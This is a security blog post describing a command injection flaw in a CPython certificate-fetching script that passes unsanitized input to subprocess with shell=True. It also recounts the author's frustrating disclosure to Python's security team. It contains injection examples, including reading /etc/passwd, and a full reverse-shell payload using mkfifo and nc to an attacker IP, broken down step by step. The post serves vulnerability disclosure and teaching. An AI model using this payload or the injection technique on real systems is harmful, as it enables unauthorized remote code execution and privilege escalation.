Getting Arbitrary Code Execution In a Python Script

UPDATE (November 2022): After much discussion, the security team at Python has decided to remove the script described below. As such, some of the links to the script (github) will no longer work. I am happy to see a mitigation for this vulnerability.

December 31. New Year’s Eve. Not so long ago. A time of reflection and new beginnings. Learning from our mistakes, charting the course for the future year, and celebrating successes. Marveling at our good — or bad — luck. Contemplative. What goals will I set for myself? What will I focus on this year? What do I want to improve?

For me, the goal was to get a CVE to my name — Not for any particular reason other than that the idea had lingered far too long in the back of my mind, and the time seemed right to focus on such a task. I dutifully jotted my goal down. Then promptly forgot about it. Until August.

In August I was reading the GitHub repo of a small open source project. A Python project that a friend referred me to. It was part of the enormous wave of security tools that crashes upon the community, hoping that, in the frothy aftermath, it would get taken up by a few members and not pulled back to the abyss by the rip current.

The Vulnerability

That is where I saw it. A call to Python’s subprocess library. Direct system call with shell enabled (shell=True). That seems dangerous, I thought to myself, and started investigating.

I spent the next few evenings pouring over the Python subprocess documentation, Google searching for patterns (limiting my search to github.com just for ease), and reading the code of various projects. A pattern emerged with the use of this library. Though it can be vulnerable, many of its uses are constructed in just the right way to avoid command injection. A common method looks to be in the use of temp files (i.e. randomized file names), and the severe restriction of user-defined input (this is good). But there are some, as there always are (and knowing this, my interest piqued), who do not follow these conventions and that leads to vulnerability — as I will describe below.

Though the subprocess functions can make unrestricted system level calls (i.e. “ls”, “pwd”, etc.) the Python language tries to limit the “direct” calls by setting the “shell” parameter to False by default. This limits the execution to the given executable (first argument in the list given). An example:

import subprocess
subprocess.Popen(['ls', '-al'])

Note that there is no ‘shell’ argument in the above Popen call. Essentially, shell=False. When shell=False the subprocess functions take a list of arguments: the executable, then any parameters for that executable. Using this method, if you wanted to execute (in bash):

ls -al > test.out

You would have to use the stdout argument of the call and open a file:

with open("test.out","wb") as f:
    subprocess.Popen(['ls', '-al'], stdout=f)

OR… you can just make the call a string and set shell=True (If shell=False, you will get a ‘FileNotFoundError’):

subprocess.Popen("ls -al > test.out", shell=True)

The ‘string method’ above looks a lot easier and better represents what the developer is trying to do (it is the actual bash command after all!). Unfortunately it can be dangerous. It may seem harmless until you get to more advanced calls — that may require user input. Here is a trivial example derived from the example above. It simply saves the ‘ls -al’ output to a given filename:

usr_inp = input("Enter filename: ")
cmd = "ls -al > %s" % str(usr_inp)
subprocess.Popen(cmd, shell=True)

Expected use is for the user to enter a filename, then the system runs “ls -al > <filename>”:

> python3 basic_example.py
> Enter filename: 1.txt

But what if we enter some malicious data? Like…

> python3 basic_example.py
> Enter filename: 1.txt;cat /etc/passwd
> ... Oh my...

This is a simple command injection vulnerability. Obviously this is a trivial example, but this class of vulnerability, with user-defined input (even filenames) leading to command injection, is still prevalent in systems.

It must be said that this can happen while using the ‘list’ approach above too. If the developer takes user input and simply calls a shell to execute it then we will see the same vulnerability:

usr_inp = input("Enter command: ")
subprocess.Popen(['/bin/bash', '-c', str(usr_input)])

This is essentially what is happening behind the scenes when the shell=True argument is set. The developer is simply doing that step instead. No shell=True required. This means that it is not enough to simply search for shell=True, but to inspect HOW the call is being made and how the command is being constructed to ensure that the code is not vulnerable to command injection. As always, the responsibility falls to the developer to understand the call that they are making and the potential issues with such calls.

So where does this leave us?
We now know about this type of vulnerability, but what can we do with it?

At this point, I had researched the class of vulnerability, played around with simple examples of sandboxed command injection to ensure I was on the right track, but the initial project I was inspecting was using the call properly. My next step was to start searching for other uses of shell=True (wouldn’t get all of the vulnerabilities but seemed like a good place to start). Google is your friend in this regard, and knowing the Google keywords such as “site:”, etc. helps.

This approach yielded fruit. In a CPython script of all things.

Buried within the CPython github repository is a Python script to pull down remote certificates. A sysadmin or advanced user would manually execute this script with a url/host and port, and the script would go there, and pull down the cert (PEM). Or. They would place it in their pipeline of scripts to be executed automatically.

The standard call would look something like this:

python3 get-remote-certificate host:port

Now there are some things to consider thus far:

The script must be manually ran or part of a pipeline. Lowers attack probability: -1 to probability.
If in a pipeline that ingests a list of URLs for certs, this limits the visibility of the attack: +1 to evasion.
The script is niche. Lowers attack probability: -1 to probability.
The nature of the script is such that it will most likely be ran with sudo privileges. Increases attack impact: +2 to impact (would be arbitrary code execution AND privesc).
The attack vector would have to be either a phish (Convince a sysadmin that this is the cert URL) or cert url list poisoning.

The Attack

I found that, given a malicious host parameter, I could achieve code execution and get a reverse shell on the target host:

[Attack Box (192.168.0.121)] > nc -nvlp 9999

[TARGET] > python3 get-remote-certificate.py "somelegitlookingurl.com/withsomeextra/saltforgoodmeasure/?URI=f2ca1bb6c7e907d06dafe4687e579fce76b37e4e93b7605022da52e6ccc26fd2?makeitlookgood=\"; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.121 9999 >/tmp/f & #":9999

So there is a lot going on here. First, there is the python call to the script “python3 get-remote-certificate.py”, then we have the host — which is a long string for an obfuscated URL (malicious payload as well) — then we have the port.

Let’s unpack the host parameter.

The wrapping double quotes of the host parameter
The double quotes are important as we want the spaces preserved in the host parameter

somelegitlookingurl.com/withsomeextra/saltforgoodmeasure/?URI=f2ca1bb6c7e907d06dafe4687e579fce76b37e4e93b7605022da52e6ccc26fd2?makeitlookgood=
This is the long obfuscation. It could have simply been nothing, but I went for a realistic url to try to fool an overworked sysadmin.

\”;
This is the crux. It terminates the string (\”) and first command (;). Now I can run my own command. Which is what I do next.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.121 9999 >/tmp/f & #
A classic reverse shell. Nothing fancy. Make it a background process (&) and comment anything else after this (#).

So why does this work? Let’s look at the code:

The script defines a function called ‘subproc’ that takes a command. This function then calls the subprocess.Popen Python function with shell=True. This in itself is not vulnerable. What we need is user-defined input being put in the command without sanitization.

Which is what we get here for Windows, and here for Linux-type systems.

Note how the Linux command is constructed:

'openssl s_client -connect "%s:%s" -showcerts < /dev/null' % (host, port)

See how the %s:%s is wrapped by double quotes? That is why my command injection attack needed the quote terminator (\”) before the semicolon (;). The command is a constructed string, and the host parameter is sent to the string without any sanitization. This is a perfect candidate for command injection.

The trick of this attack would be to somehow get the sysadmin to use the URL — or poison a list of URLs with the malicious one. But If one were to achieve that, it would likely result in a privileged arbitrary code execution (remote).

An interesting find.

Disclosure

I contacted Python at security@python.org with a full write-up, POC, and screenshots. Then waited.
While I waited, I submitted a CVE Request to MITRE (as I was now keenly aware of my New Year’s goal). I wrote a patch for the script and submitted a pull request for review. After a while, still with no response from Python, I followed up with them.

What transpired was a back-and-forth discussion about the attack surface, probability of attack, and the nature of the script. Triage. I have to admit, I was some-what astonished at their approach. The level of inertia, the resistance to do anything, seemed high. Granted, this is no critical RCE in core Python libraries, but I was surprised with their lack of interest in fixing a clearly-vulnerable script that could lead to privileged code execution. I even fixed it and submitted the pull request for them. From a ‘level of work’ perspective, this seemed like a clear ‘win’.

Now, I am not so naive to think that “my discovery is the most important and must be addressed now”, and I am no stranger to red tape and due process, but the encounter left a bad taste in my mouth. Especially after the discussion, where one participant included the equivalent of “it works on my machine”, and they asked me to revoke my CVE request (to which I complied) else they would contact MITRE and say it is invalid (Though it is clearly not).

What was left, was an unpatched vulnerability in a Python script, no CVE for me, and a rather bleak outlook at the responsible disclosure process. I have to admit, it does not encourage one to follow such a process in the future. This is an issue that us Blue-Teamers need to be concerned about. In any situation we need to consider what the environment favours. If it favours dropping 0-days on Twitter then that is what we should expect. We can not make a process convoluted and frustrating and expect users to follow it. We’re better than this.

Caleb Shortt

Technology and Other Interesting Topics

Getting Arbitrary Code Execution In a Python Script

The Vulnerability

The Attack

Disclosure

The Vulnerability

The Attack

Disclosure

Share this: